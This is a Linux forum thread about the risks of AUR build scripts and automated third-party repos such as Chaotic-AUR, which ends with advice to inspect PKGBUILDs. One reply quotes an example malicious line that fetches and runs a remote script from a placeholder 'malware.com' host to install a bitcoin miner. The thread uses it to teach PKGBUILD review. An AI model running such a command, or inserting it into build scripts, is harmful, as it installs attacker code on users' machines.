It takes only one… 
True, as we have seen in recent months…
1 Like
The key here is to decrease your dependency on potentially evil people.
Dalto wrote a great FAQ about third-party repos that everyone should read:
I would like to add to this that third party repos that automate building packages from the AUR like, for example, the Chaotic-AUR, seem especially dangerous to me. If I were a malicious person wanting to spread my malware, one way I could potentially do it is through the Chaotic-AUR, since it automatically builds packages from the AUR and there is no checking of PKGBUILDs. So all it would probably take is to upload a malicious PKGBUILD to the AUR at just the right moment for it to get pulled to the Chaotic-AUR.
2 Likes
Too late i’ve already got too paranoid see compile you later on Gentoo! 
2 Likes
So, AUR is not considered 3rd party? Why is that?
After all, the packages in there are not Arch, and in fact I have seen warnings about using AUR precisely because the packages are compiled by others.
So, your comment confuses me a bit.
The AUR is not a repo at all (it’s a misnomer). It does not contain any packages, just build scripts that contain the instructions on how to make packages yourself, locally.
When you install from the AUR, you do the packaging yourself, so you can know exactly what goes into the package, and thus it’s your responsibility not to let any malware slip into the package.
1 Like
OK, it contains build scripts, but those could be malignant, and they are certainly not compiled by Arch.
Yes, a PKGBUILD could easily contain a line like:
/bin/bash <(curl -s http://www.malware.com/install_bitcoin_miner.sh)
It can also contain stupid mistakes by people writing the code, which are not intentionally malicious, but can nevertheless destroy your system and cause you to lose data. For example:
That’s why you should check it whenever you’re building a package from the AUR. Also, read the comments on the AUR webpage, stick to more popular packages and report anything malevolent or suspicious. Also, you should have all important data backed up, that should go without saying.
However, the PKGBUILD used to build packages in the repos could also contain something like above (well, it probably wouldn’t install malware on the packager’s local computer, that would be stupid ). The difference is that you cannot check for that, since the package is already built when you get it, hence you are blindly trusting the packager.
1 Like
I have installed librewolf-bin with success, so I will delete the appimage. I have marked one of your comments as the solution, and will mark this thread as solved.
Thanks for your help.
My take-away from this thread is:
- use apps from official repos (Endeavour or Arch)
- use a bin package if possible, install with yay (I love yay)
- use AUR with care
- don’t use chaotic-AUR
Thanks also to @ishaan2479, @manuel and @keybreak for your input.
1 Like
One more take-away:
- ask here if you are not sure about the reliability of the source of the install
2 Likes
You are right. Note: that is what my OP at the top of this thread was meant for 
2 Likes
This topic was automatically closed 2 days after the last reply. New replies are no longer allowed.